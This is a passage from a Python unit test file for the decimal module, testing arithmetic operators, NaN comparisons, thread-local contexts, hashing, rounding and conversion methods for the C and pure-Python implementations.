import locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
